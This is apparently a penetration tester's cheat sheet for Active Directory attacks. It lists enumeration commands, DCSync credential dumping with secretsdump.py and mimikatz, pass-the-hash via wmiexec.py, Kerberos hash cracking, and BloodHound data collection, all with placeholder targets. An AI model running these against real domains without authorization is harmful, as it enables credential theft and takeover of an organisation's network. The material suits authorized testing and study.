Active Directoy

Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management.

-- Wikipedia

Related

• TCP 88: Kerberos

• TCP 389, 636, 3268, 3269: LDAP

• Impacket

• PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings · GitHub

Target

• Domain Admins group

• Domain Controller

General

Display permissions using PowerShell

dsacls "DC=<domain>,DC=<domain>"

net

List local accounts

net user

List domain accounts

net user /domain

Details about specific user

net user <user> /domain

List domain groups

net group /domain

Show domain's account policy

net accounts

DC sync attack

DC Sync Attacks With Secretsdump.py - YouTube

secretsdump.py <domain>/<user>:<pw>@<ip>

wmiexec.py <domain>/<user>@<ip> -hashes "<hash>"

Alternative approach (probably gets flagged by AV) Copy & execute mimikatz.exe on DC

lsadump::dcsync

Pre-Auth attack

Getting Passwords When Kerberos Pre-Auth IS Enabled - YouTube 1. sniff KRB auth packet 2. crack using hashcat

-> If no pre auth is required, just use Impacket to pull hashes from AD.

BloodHound

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. GitHub - BloodHoundAD/BloodHound

Gather information (on target)

pip3 install bloodhound
bloodhound-python -u <username> -p <password> -ns <nameserver> -d <domain> -c All

OR

.\SharpHound.exe -c all -d <domain> --domaincontroller <dc-ip>

Copy generated *BloodHound.zip

OR

SharpHound.ps1
Invoke-BloodHound -Domain <domain> -LDAPUser <user> -LDAPPass <pass> -CollectionMethod All -DomainController <dc-ip>

Analyze data (on kali)

neo4j console
bloodhound

Connect to database

bolt://localhost:7687
neo4j
<PW>

Import data Upload Data select .csv, .json or .zip file(s)